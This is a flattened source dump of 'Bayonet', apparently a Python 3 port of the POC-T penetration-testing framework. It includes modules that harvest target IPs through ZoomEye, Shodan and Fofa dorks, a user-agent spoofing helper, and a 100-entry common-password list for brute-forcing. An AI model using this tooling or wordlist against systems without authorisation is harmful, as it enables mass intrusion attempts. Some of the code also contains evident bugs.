/thirdparty/termcolor/__pycache__/termcolor.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XiaOkuoAi/Bayonet/HEAD/thirdparty/termcolor/__pycache__/termcolor.cpython-37.pyc -------------------------------------------------------------------------------- /thirdparty/colorama/__pycache__/ansitowin32.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XiaOkuoAi/Bayonet/HEAD/thirdparty/colorama/__pycache__/ansitowin32.cpython-37.pyc -------------------------------------------------------------------------------- /Bayonet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # auther = Syst1m 4 | 5 | from lib.utils import versioncheck 6 | from lib.cli import main 7 | 8 | 9 | if __name__ == '__main__': 10 | main() -------------------------------------------------------------------------------- /script/test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # auther = Syst1m 4 | 5 | import random 6 | import time 7 | 8 | def poc(str): 9 | time.sleep(3) 10 | if random.randint(1,10)>5: 11 | return True 12 | return False -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Bayonet 2 | Python3版本Poc-T(渗透测试插件化并发框架) 3 | 4 | 5 | **由于自己比较喜欢python3,又比较喜欢POC-T这款框架,于是对代码进行了部分修改,使Python3也可以进行使用。** 6 | 7 | - 使用方法相同于POC-T 8 | 9 | ![](https://maekdown-1300474679.cos.ap-beijing.myqcloud.com/20200403211439.png) 10 | 11 | 12 | 13 | >原框架地址:https://github.com/Xyntax/POC-T/ 14 | -------------------------------------------------------------------------------- /lib/core/data.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | 6 | from lib.core.log import MY_LOGGER 7 | from lib.core.datatype import AttribDict 8 | 9 | logger = MY_LOGGER 10 | 11 | paths = AttribDict() 12 | 13 | cmdLineOptions = AttribDict() 14 | 15 | conf = AttribDict() 16 | 17 | th = AttribDict() -------------------------------------------------------------------------------- /lib/utils/versioncheck.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | 6 | import sys 7 | 8 | PYVERSION = sys.version.split()[0] 9 | 10 | if PYVERSION <= "3": 11 | exit("[CRITICAL] incompatible Python version detected ('%s'). " 12 | "For successfully running this project, you'll have to use version 3" 13 | "(visit 'http://www.python.org/download/')" % PYVERSION) -------------------------------------------------------------------------------- /toolkit.conf: -------------------------------------------------------------------------------- 1 | [zoomeye] zoomeye API 2 | email: 3 | password: 4 | 5 | [shodan] shadan API 6 | api_key: 7 | 8 | [google] 9 | #proxy:http 127.0.0.1 1894 10 | #proxy:sock5 127.0.0.1 7070 11 | proxy: 12 | developer_key: 13 | search_engine: 14 | 15 | [fofa] fofa API 16 | email: 17 | api_key: 18 | 19 | [bing] bing APU 20 | api_key: 21 | 22 | [cloudeye] cloudeye APi 23 | # your API-key in "http://cloudeye.me/?a=list" 24 | api_key: 25 | # your personal sub-domain, like: [user].dnslog.info 26 | personal_domain: -------------------------------------------------------------------------------- /lib/core/exception.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | class ToolkitBaseException(Exception): 6 | pass 7 | 8 | 9 | class ToolkitConnectionException(Exception): 10 | pass 11 | 12 | 13 | class ToolkitDataException(ToolkitBaseException): 14 | pass 15 | 16 | 17 | class ToolkitMissingPrivileges(ToolkitBaseException): 18 | pass 19 | 20 | 21 | class ToolkitUserQuitException(ToolkitBaseException): 22 | pass 23 | 24 | 25 | class ToolkitSystemException(ToolkitBaseException): 26 | pass 27 | 28 | 29 | class ToolkitValueException(ToolkitBaseException): 30 | pass 31 | 32 | 33 | class ToolkitPluginException(ToolkitBaseException): 34 | pass 35 | 36 | 37 | class RegisterException(Exception): 38 | pass 39 | 40 | 41 | class RegisterValueException(RegisterException): 42 | pass 43 | 44 | 45 | class RegisterDataException(RegisterException): 46 | pass 47 | 48 | 49 | class RegisterMutexException(RegisterException): 50 | pass 51 | -------------------------------------------------------------------------------- /lib/core/enums.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | class CUSTOM_LOGGING: 6 | SYSINFO = 9 7 | SUCCESS = 8 8 | ERROR = 7 9 | WARNING = 6 10 | 11 | 12 | class CONTENT_STATUS: 13 | IN_PROGRESS = 0 14 | COMPLETE = 1 15 | 16 | 17 | class EXIT_STATUS: 18 | SYSETM_EXIT = 0 19 | ERROR_EXIT = 1 20 | USER_QUIT = 2 21 | 22 | 23 | class POC_RESULT_STATUS: 24 | FAIL = 0 25 | SUCCESS = 1 26 | RETRAY = 2 27 | 28 | 29 | class API_MODE_NAME: 30 | ZOOMEYE = 'ZoomEye' 31 | SHODAN = 'Shodan' 32 | GOOGLE = 'Google' 33 | FOFA = 'Fofa' 34 | 35 | 36 | class TARGET_MODE_STATUS: 37 | FILE = 9 38 | SINGLE = 8 39 | IPMASK = 7 40 | RANGE = 6 41 | API = 5 42 | 43 | 44 | class ENGINE_MODE_STATUS: 45 | THREAD = 9 46 | GEVENT = 8 47 | 48 | 49 | class PROXY_TYPE: # keep same with SocksiPy(import socks) 50 | PROXY_TYPE_SOCKS4 = SOCKS4 = 1 51 | PROXY_TYPE_SOCKS5 = SOCKS5 = 2 52 | PROXY_TYPE_HTTP = HTTP = 3 53 | PROXY_TYPE_HTTP_NO_TUNNEL = 4 54 | -------------------------------------------------------------------------------- /lib/core/settings.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | import os 6 | import subprocess 7 | 8 | VERSION = '1.0.0' 9 | PROJECT = "Bayonet" 10 | AUTHOR = 'syst1m' 11 | MAIL = '1990758989@qq.com' 12 | PLATFORM = os.name 13 | IS_WIN = subprocess._mswindows 14 | 15 | # essential methods/functions in custom scripts/PoC (such as function poc()) 16 | ESSENTIAL_MODULE_METHODS = ['poc'] 17 | 18 | # Encoding used for Unicode data 19 | UNICODE_ENCODING = "utf-8" 20 | 21 | # String representation for NULL value 22 | NULL = "NULL" 23 | 24 | # Format used for representing invalid unicode characters 25 | INVALID_UNICODE_CHAR_FORMAT = r"\x%02x" 26 | 27 | ISSUES_PAGE = "" 28 | GIT_REPOSITORY = "" 29 | GIT_PAGE = "" 30 | 31 | BANNER = """\033[01;34m 32 | __ \033[01;31m__/\033[01;34m 33 | )_) _ _ _ _ _)_ \033[01;33m/ \033[01;31m__/\033[01;34m 34 | /__) (_( (_( (_) ) ) )_) (_ \033[01;33m_/\033[01;34m 35 | _) (_ 36 | 37 | 38 | \033[01;37m{\033[01;m Version %s by %s mail:%s \033[01;37m}\033[0m 39 | \n"""% (VERSION, AUTHOR, MAIL) -------------------------------------------------------------------------------- /thirdparty/httplib2/certs.py: -------------------------------------------------------------------------------- 1 | """Utilities for certificate management.""" 2 | 3 | import os 4 | 5 | certifi_available = False 6 | certifi_where = None 7 | try: 8 | from certifi import where as certifi_where 9 | certifi_available = True 10 | except ImportError: 11 | pass 12 | 13 | custom_ca_locater_available = False 14 | custom_ca_locater_where = None 15 | try: 16 | from ca_certs_locater import get as custom_ca_locater_where 17 | custom_ca_locater_available = True 18 | except ImportError: 19 | pass 20 | 21 | 22 | BUILTIN_CA_CERTS = os.path.join( 23 | os.path.dirname(os.path.abspath(__file__)), "cacerts.txt" 24 | ) 25 | 26 | 27 | def where(): 28 | env = os.environ.get("HTTPLIB2_CA_CERTS") 29 | if env is not None: 30 | if os.path.isfile(env): 31 | return env 32 | else: 33 | raise RuntimeError("Environment variable HTTPLIB2_CA_CERTS not a valid file") 34 | if custom_ca_locater_available: 35 | return custom_ca_locater_where() 36 | if certifi_available: 37 | return certifi_where() 38 | return BUILTIN_CA_CERTS 39 | 40 | 41 | if __name__ == "__main__": 42 | print(where()) 43 | -------------------------------------------------------------------------------- /thirdparty/colorama/ansi.py: -------------------------------------------------------------------------------- 1 | ''' 2 | This module generates ANSI character codes to printing colors to terminals. 3 | See: http://en.wikipedia.org/wiki/ANSI_escape_code 4 | ''' 5 | 6 | CSI = '\033[' 7 | 8 | def code_to_chars(code): 9 | return CSI + str(code) + 'm' 10 | 11 | class AnsiCodes(object): 12 | def __init__(self, codes): 13 | for name in dir(codes): 14 | if not name.startswith('_'): 15 | value = getattr(codes, name) 16 | setattr(self, name, code_to_chars(value)) 17 | 18 | class AnsiFore: 19 | BLACK = 30 20 | RED = 31 21 | GREEN = 32 22 | YELLOW = 33 23 | BLUE = 34 24 | MAGENTA = 35 25 | CYAN = 36 26 | WHITE = 37 27 | RESET = 39 28 | 29 | class AnsiBack: 30 | BLACK = 40 31 | RED = 41 32 | GREEN = 42 33 | YELLOW = 43 34 | BLUE = 44 35 | MAGENTA = 45 36 | CYAN = 46 37 | WHITE = 47 38 | RESET = 49 39 | 40 | class AnsiStyle: 41 | BRIGHT = 1 42 | DIM = 2 43 | NORMAL = 22 44 | RESET_ALL = 0 45 | 46 | Fore = AnsiCodes( AnsiFore ) 47 | Back = AnsiCodes( AnsiBack ) 48 | Style = AnsiCodes( AnsiStyle ) 49 | 50 | -------------------------------------------------------------------------------- /lib/api/zoomeye/pack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | 6 | import sys 7 | from lib.api.zoomeye.base import ZoomEye 8 | from lib.core.data import logger 9 | 10 | 11 | def _initial(): 12 | z = ZoomEye() 13 | z.auto_login() 14 | info = z.resources_info().get('resources') 15 | if info: 16 | msg = 'Available ZoomEye search: (search:%s)' % (info.get('search', 'NO FOUND')) 17 | logger.info(msg) 18 | else: 19 | msg = 'ZoomEye API authorization failed, Please re-run it and enter a new token.' 20 | sys.exit(logger.error(msg)) 21 | return z 22 | 23 | 24 | def ZoomEyeSearch(query, limit, type='host', offset=0): 25 | z = _initial() 26 | ans = [] 27 | limit += offset 28 | for page_n in range(int(offset / 10), int((limit + 10 - 1) / 10)): 29 | data = z.dork_search(query, resource=type, page=page_n) 30 | if data: 31 | for i in data: 32 | ip_str = i.get('ip') 33 | if 'portinfo' in i: 34 | ip_str = ip_str + ':' + str(i.get('portinfo').get('port')) 35 | ans.append(ip_str) 36 | else: 37 | break 38 | return ans 39 | -------------------------------------------------------------------------------- /thirdparty/odict/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # The BSD License 4 | # 5 | # Copyright 2003-2008 Nicola Larosa, Michael Foord 6 | # 7 | # Permission is hereby granted, free of charge, to any person obtaining a copy 8 | # of this software and associated documentation files (the "Software"), to deal 9 | # in the Software without restriction, including without limitation the rights 10 | # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | # copies of the Software, and to permit persons to whom the Software is 12 | # furnished to do so, subject to the following conditions: 13 | # 14 | # The above copyright notice and this permission notice shall be included in 15 | # all copies or substantial portions of the Software. 16 | # 17 | # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 23 | # THE SOFTWARE. 24 | # 25 | 26 | pass 27 | -------------------------------------------------------------------------------- /lib/core/revision.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | 6 | import os 7 | import re 8 | 9 | from subprocess import PIPE 10 | from subprocess import Popen as execute 11 | 12 | def getRevisionNumber(): 13 | """ 14 | Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD" 15 | """ 16 | 17 | retval = None 18 | filePath = None 19 | _ = os.path.dirname(__file__) 20 | 21 | while True: 22 | filePath = os.path.join(_,".git","HEAD") 23 | if os.path.exists(filePath): 24 | break 25 | else: 26 | filePath = None 27 | if _ == os.path.dirname(_): 28 | break 29 | else: 30 | _ = os.path.dirname(_) 31 | while True: 32 | if filePath and os.path.isfile(filePath): 33 | with open(filePath,"r") as f: 34 | content = f.read() 35 | filePath = None 36 | if content.startwith("ref: "): 37 | filePath = os.path.join(_,".git",content.replace("ref: ","").strip()) 38 | else: 39 | match = re.match(r"(?i)[0-9a-f]{32}", content) 40 | retval = match.group(0) if match else None 41 | else: 42 | break 43 | 44 | if not retval: 45 | process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE) 46 | stdout, _ = process.communicate() 47 | match = re.search(r"(?i)[0-9a-f]{32}", stdout or "") 48 | retVal = match.group(0) if match else None 49 | 50 | return retval[:7] if retVal else None -------------------------------------------------------------------------------- /thirdparty/colorama/initialise.py: -------------------------------------------------------------------------------- 1 | import atexit 2 | import sys 3 | 4 | from .ansitowin32 import AnsiToWin32 5 | 6 | 7 | orig_stdout = sys.stdout 8 | orig_stderr = sys.stderr 9 | 10 | wrapped_stdout = sys.stdout 11 | wrapped_stderr = sys.stderr 12 | 13 | atexit_done = False 14 | 15 | 16 | def reset_all(): 17 | AnsiToWin32(orig_stdout).reset_all() 18 | 19 | 20 | def init(autoreset=False, convert=None, strip=None, wrap=True): 21 | 22 | if not wrap and any([autoreset, convert, strip]): 23 | raise ValueError('wrap=False conflicts with any other arg=True') 24 | 25 | global wrapped_stdout, wrapped_stderr 26 | sys.stdout = wrapped_stdout = \ 27 | wrap_stream(orig_stdout, convert, strip, autoreset, wrap) 28 | sys.stderr = wrapped_stderr = \ 29 | wrap_stream(orig_stderr, convert, strip, autoreset, wrap) 30 | 31 | global atexit_done 32 | if not atexit_done: 33 | atexit.register(reset_all) 34 | atexit_done = True 35 | 36 | 37 | def deinit(): 38 | sys.stdout = orig_stdout 39 | sys.stderr = orig_stderr 40 | 41 | 42 | def reinit(): 43 | sys.stdout = wrapped_stdout 44 | sys.stderr = wrapped_stdout 45 | 46 | 47 | def wrap_stream(stream, convert, strip, autoreset, wrap): 48 | if wrap: 49 | wrapper = AnsiToWin32(stream, 50 | convert=convert, strip=strip, autoreset=autoreset) 51 | if wrapper.should_wrap(): 52 | stream = wrapper.stream 53 | return stream 54 | 55 | 56 | -------------------------------------------------------------------------------- /lib/core/convert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | import sys 6 | from lib.core.settings import IS_WIN, UNICODE_ENCODING 7 | 8 | 9 | def singleTimeWarnMessage(message): # Cross-linked function 10 | sys.stdout.write(message) 11 | sys.stdout.write("\n") 12 | sys.stdout.flush() 13 | 14 | 15 | def stdoutencode(data): 16 | retVal = None 17 | 18 | try: 19 | data = data or "" 20 | 21 | # Reference: http://bugs.python.org/issue1602 22 | if IS_WIN: 23 | output = data.encode(sys.stdout.encoding, "replace") 24 | # 用?代替错误 25 | 26 | if '?' in output and '?' not in data: 27 | warnMsg = "cannot properly display Unicode characters " 28 | warnMsg += "inside Windows OS command prompt " 29 | warnMsg += "(http://bugs.python.org/issue1602). All " 30 | warnMsg += "unhandled occurances will result in " 31 | warnMsg += "replacement with '?' character. Please, find " 32 | warnMsg += "proper character representation inside " 33 | warnMsg += "corresponding output files. " 34 | singleTimeWarnMessage(warnMsg) 35 | 36 | retVal = output 37 | else: 38 | retVal = data.encode(sys.stdout.encoding) 39 | except Exception: 40 | retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else data 41 | 42 | return retVal 43 | -------------------------------------------------------------------------------- /data/pass100.txt: -------------------------------------------------------------------------------- 1 | 123456789 2 | a123456 3 | 123456 4 | a123456789 5 | 1234567890 6 | woaini1314 7 | qq123456 8 | abc123456 9 | 123456a 10 | 123456789a 11 | 147258369 12 | zxcvbnm 13 | 987654321 14 | 12345678910 15 | abc123 16 | qq123456789 17 | 123456789. 18 | 7708801314520 19 | woaini 20 | 5201314520 21 | q123456 22 | 123456abc 23 | 1233211234567 24 | 123123123 25 | 123456. 26 | 0123456789 27 | asd123456 28 | aa123456 29 | 135792468 30 | q123456789 31 | abcd123456 32 | 12345678900 33 | woaini520 34 | woaini123 35 | zxcvbnm123 36 | 1111111111111111 37 | w123456 38 | aini1314 39 | abc123456789 40 | 111111 41 | woaini521 42 | qwertyuiop 43 | 1314520520 44 | 1234567891 45 | qwe123456 46 | asd123 47 | 000000 48 | 1472583690 49 | 1357924680 50 | 789456123 51 | 123456789abc 52 | z123456 53 | 1234567899 54 | aaa123456 55 | abcd1234 56 | www123456 57 | 123456789q 58 | 123abc 59 | qwe123 60 | w123456789 61 | 7894561230 62 | 123456qq 63 | zxc123456 64 | 123456789qq 65 | 1111111111 66 | 111111111 67 | 0000000000000000 68 | 1234567891234567 69 | qazwsxedc 70 | qwerty 71 | 123456.. 72 | zxc123 73 | asdfghjkl 74 | 0000000000 75 | 1234554321 76 | 123456q 77 | 123456aa 78 | 9876543210 79 | 110120119 80 | qaz123456 81 | qq5201314 82 | 123698745 83 | 5201314 84 | 000000000 85 | as123456 86 | 123123 87 | 5841314520 88 | z123456789 89 | 52013145201314 90 | a123123 91 | caonima 92 | a5201314 93 | wang123456 94 | abcd123 95 | 123456789.. 96 | woaini1314520 97 | 123456asd 98 | aa123456789 99 | 741852963 100 | a12345678 -------------------------------------------------------------------------------- /plugin/urlparser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # auther = Syst1m 4 | 5 | from urllib import parse 6 | 7 | def get_domain(url): 8 | 9 | """ 10 | added by cdxy May 8 Sun,2016 11 | 12 | Use: 13 | get_domain('http://cdxy.me:80/cdsa/cda/aaa.jsp?id=2#') 14 | 15 | Return: 16 | 'http://cdxy.me:80' 17 | """ 18 | p = parse.urlparse(url) 19 | return parse.urlunsplit([p.scheme, p.netloc, '', '', '']) 20 | 21 | def iterate_path(ori_str): 22 | """ 23 | 24 | Use: 25 | iterate_path_to_list('http://xxx.com:80/cdsa/cda/aaa.jsp?id=2#') 26 | 27 | Return: 28 | ['http://xxx.com:80/cdsa/cda/aaa.jsp?id=2#', 29 | 'http://xxx.com:80/' 30 | 'http://xxx.com:80/cdsa', 31 | 'http://xxx.com:80/cdsa/cda', 32 | 'http://xxx.com:80/cdsa/cda/aaa.jsp'] 33 | 34 | """ 35 | parser = parse.urlparse(ori_str) 36 | _path_list = parser.path.replace('//', '/').strip('/').split('/') 37 | _ans_list = set() 38 | _ans_list.add(ori_str) 39 | 40 | if not _path_list[0]: 41 | return _ans_list 42 | 43 | _ans_list.add(get_domain(ori_str)) 44 | s = '' 45 | for each in _path_list: 46 | s += '/' + each 47 | _ans_list.add(parse.urljoin(ori_str, s)) 48 | return _ans_list 49 | 50 | 51 | 52 | if __name__ =='__main__': 53 | 54 | 55 | url = "http://xxx.com:80/cdsa/cda/aaa.jsp?id=2#" 56 | 57 | iterate_path(url) 58 | 59 | # print(parse.urlparse(url)) 60 | # print(get_domain(url)) 61 | 62 | # for each in iterate_path(url): 63 | # print(each) 64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /lib/controller/api.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | import os 6 | import time 7 | from lib.core.data import conf, logger 8 | from lib.core.exception import ToolkitValueException 9 | from lib.core.enums import API_MODE_NAME 10 | from lib.api.shodan.pack import ShodanSearch 11 | from lib.api.zoomeye.pack import ZoomEyeSearch 12 | from lib.api.google.pack import GoogleSearch 13 | from lib.api.fofa.pack import FofaSearch 14 | 15 | def runApi(): 16 | output = conf.API_OUTPUT 17 | dork = conf.API_DORK 18 | limit = conf.API_LIMIT 19 | logger.info('Activate %s API' % conf.API_MODE) 20 | if conf.API_MODE is API_MODE_NAME.ZOOMEYE: 21 | anslist = ZoomEyeSearch(query=dork, limit=limit, type=conf.ZOOMEYE_SEARCH_TYPE, offset=conf.API_OFFSET) 22 | elif conf.API_MODE is API_MODE_NAME.SHODAN: 23 | anslist = ShodanSearch(query=dork, limit=limit, offset=conf.API_OFFSET) 24 | elif conf.API_MODE is API_MODE_NAME.GOOGLE: 25 | anslist = GoogleSearch(query=dork, limit=limit, offset=conf.API_OFFSET) 26 | elif conf.API_MODE is API_MODE_NAME.FOFA: 27 | anslist = FofaSearch(query=dork, limit=limit, offset=conf.API_OFFSET) 28 | else: 29 | raise ToolkitValueException('Unknown API mode') 30 | 31 | tmpIpFile = os.path.join(output, '%s.txt' % (time.strftime('%Y%m%d%H%M%S'))) 32 | with open(tmpIpFile, 'w') as fp: 33 | for each in anslist: 34 | if isinstance(each, list): # for ZoomEye web type 35 | each = each[0] 36 | fp.write(each + '\n') 37 | return tmpIpFile -------------------------------------------------------------------------------- /lib/utils/config.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | 6 | import ConfigParser 7 | from lib.core.data import paths, logger 8 | from lib.core.common import getSafeExString 9 | 10 | 11 | class ConfigFileParser: 12 | @staticmethod 13 | def _get_option(section, option): 14 | try: 15 | cf = ConfigParser.ConfigParser() 16 | cf.read(paths.CONFIG_PATH) 17 | return cf.get(section=section, option=option) 18 | except ConfigParser.NoOptionError as e: 19 | logger.warning('Missing essential options, please check your config-file.') 20 | logger.error(getSafeExString(e)) 21 | return '' 22 | 23 | def ZoomEyeEmail(self): 24 | return self._get_option('zoomeye', 'email') 25 | 26 | def ZoomEyePassword(self): 27 | return self._get_option('zoomeye', 'password') 28 | 29 | def ShodanApikey(self): 30 | return self._get_option('shodan', 'api_key') 31 | 32 | def BingApikey(self): 33 | return self._get_option('bing', 'api_key') 34 | 35 | def CloudEyeApikey(self): 36 | return self._get_option('cloudeye', 'api_key') 37 | 38 | def ColudEyePersonaldomain(self): 39 | return self._get_option('cloudeye', 'personal_domain') 40 | 41 | def GoogleProxy(self): 42 | return self._get_option('google', 'proxy') 43 | 44 | def GoogleDeveloperKey(self): 45 | return self._get_option('google', 'developer_key') 46 | 47 | def GoogleEngine(self): 48 | return self._get_option('google', 'search_engine') 49 | 50 | def FofaEmail(self): 51 | return self._get_option('fofa','email') 52 | 53 | def FofaKey(self): 54 | return self._get_option('fofa','api_key') 55 | -------------------------------------------------------------------------------- /lib/core/log.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | import logging 6 | import sys 7 | 8 | from lib.core.enums import CUSTOM_LOGGING 9 | 10 | logging.addLevelName(CUSTOM_LOGGING.SYSINFO, "*") 11 | logging.addLevelName(CUSTOM_LOGGING.SUCCESS, "+") 12 | logging.addLevelName(CUSTOM_LOGGING.ERROR, "-") 13 | logging.addLevelName(CUSTOM_LOGGING.WARNING, "!") 14 | 15 | LOGGER = logging.getLogger("TookitLogger") 16 | 17 | LOGGER_HANDLER = None 18 | try: 19 | from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler 20 | 21 | try: 22 | LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout) 23 | LOGGER_HANDLER.level_map[logging.getLevelName("*")] = (None, "cyan", False) 24 | LOGGER_HANDLER.level_map[logging.getLevelName("+")] = (None, "green", False) 25 | LOGGER_HANDLER.level_map[logging.getLevelName("-")] = (None, "red", False) 26 | LOGGER_HANDLER.level_map[logging.getLevelName("!")] = (None, "yellow", False) 27 | except Exception: 28 | LOGGER_HANDLER = logging.StreamHandler(sys.stdout) 29 | 30 | except ImportError: 31 | LOGGER_HANDLER = logging.StreamHandler(sys.stdout) 32 | 33 | FORMATTER = logging.Formatter("\r[%(levelname)s] %(message)s", "%H:%M:%S") 34 | 35 | LOGGER_HANDLER.setFormatter(FORMATTER) 36 | LOGGER.addHandler(LOGGER_HANDLER) 37 | LOGGER.setLevel(CUSTOM_LOGGING.WARNING) 38 | 39 | 40 | class MY_LOGGER: 41 | @staticmethod 42 | def success(msg): 43 | return LOGGER.log(CUSTOM_LOGGING.SUCCESS, msg) 44 | 45 | @staticmethod 46 | def info(msg): 47 | return LOGGER.log(CUSTOM_LOGGING.SYSINFO, msg) 48 | 49 | @staticmethod 50 | def warning(msg): 51 | return LOGGER.log(CUSTOM_LOGGING.WARNING, msg) 52 | 53 | @staticmethod 54 | def error(msg): 55 | return LOGGER.log(CUSTOM_LOGGING.ERROR, msg) -------------------------------------------------------------------------------- /plugin/useragent.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # auther = Syst1m 4 | 5 | import random 6 | from lib.core.data import conf, th, paths, logger 7 | from lib.core.common import getFileItems 8 | 9 | 10 | def _init_UAlist(path): 11 | infoMsg = "loading HTTP User-Agent header(s) from " 12 | infoMsg += "file '%s'" % path 13 | logger.info(infoMsg) 14 | 15 | # TODO 此处 conf.RANDOM_UA 在其他地方暂时没有用到 16 | conf.RANDOM_UA = True 17 | th.UA_LIST = getFileItems(path) 18 | 19 | successMsg = "Total: %d" % len(th.UA_LIST) 20 | logger.info(successMsg) 21 | 22 | 23 | def get_random_agent(path=paths.UA_LIST_PATH): 24 | if "UA_LIST" not in th: 25 | _init_UAlist(path) 26 | try: 27 | return random.sample(th.UA_LIST, 1)[0] 28 | except IOError as e: 29 | warnMsg = "unable to read HTTP User-Agent header " 30 | warnMsg += "file '%s'" % path 31 | logger.warning(warnMsg) 32 | return 33 | 34 | def ie(): 35 | return 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)' 36 | 37 | 38 | def chrome(): 39 | return 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30' 40 | 41 | 42 | def opera(): 43 | return 'Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.9.168 Version/11.50' 44 | 45 | 46 | def iphone(): 47 | return 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16' 48 | 49 | 50 | def google_bot(): 51 | return 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' 52 | 53 | 54 | def msn_bot(): 55 | return 'msnbot/1.1 (+http://search.msn.com/msnbot.htm)' 56 | 57 | 58 | def yahoo_bot(): 59 | return 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)' 60 | -------------------------------------------------------------------------------- /plugin/extracts.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # auther = Syst1m 4 | 5 | 6 | import re 7 | import requests 8 | 9 | 10 | def getIP(content, remove_duplicate=True, remove_private=False): 11 | """ 12 | Functions to extract IP from content string 13 | 14 | parameters: 15 | content 16 | remove_duplicate (default:true) 17 | remove_private (default:False) 18 | 19 | usage: 20 | from lib.util.extracts import * 21 | ip_list = getIP(content) 22 | 23 | private address: 24 | 10.0.0.0 - 10.255.255.255 25 | 172.16.0.0 - 172.31.255.255 26 | 192.168.0.0 - 192.168.255.255 27 | 127.0.0.0 - 127.255.255.255 28 | 29 | example: 30 | > print getIP('ffeac12.2.2.2asf^&10.10\n.1.1ffa2\n') 31 | ['12.2.2.2','10.10.1.1'] 32 | 33 | """ 34 | 35 | def _isPrivateIP(strict_IP): 36 | p1 = re.compile(r'^10\.|^172\.(?:1[6789]|2\d|31)\.|^192\.168\.|^127\.') 37 | return True if re.match(p1, strict_IP) else False 38 | 39 | content = content.replace('\n', ',') 40 | p = re.compile(r'(?:(?:2[0-4]\d|25[0-5]|[01]?\d\d?)\.){3}(?:2[0-4]\d|25[0-5]|[01]?\d\d?)') 41 | _ = re.findall(p, content) 42 | ans = list(set(_)) if remove_duplicate else _ 43 | 44 | if remove_private: 45 | for each in ans: 46 | if _isPrivateIP(each): 47 | ans.remove(each) 48 | 49 | return ans 50 | 51 | 52 | def getTitle(input): 53 | """ 54 | Get title from html-content/ip/url 55 | 56 | :param input:html-content OR ip OR url 57 | :return text in 58 | :except return string:'NULL' 59 | """ 60 | try: 61 | if '<title>' in input: 62 | content = input 63 | else: 64 | url = 'http://' + input if '://' not in input else input 65 | content = requests.get(url,timeout=3).content 66 | return re.findall('<title>([\s\S]*)', content)[0].strip() 67 | except Exception: 68 | return '' 69 | -------------------------------------------------------------------------------- /lib/api/shodan/pack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | 6 | import shodan 7 | import sys 8 | from lib.core.data import paths, logger 9 | from shodan.exception import APIError 10 | from lib.utils.config import ConfigFileParser 11 | 12 | 13 | class ShodanBase: 14 | def __init__(self, query, limit, offset): 15 | self.query = query 16 | self.limit = limit 17 | self.offset = offset 18 | self.api_key = None 19 | self.result = None 20 | 21 | def login(self): 22 | msg = 'Trying to login with credentials in config 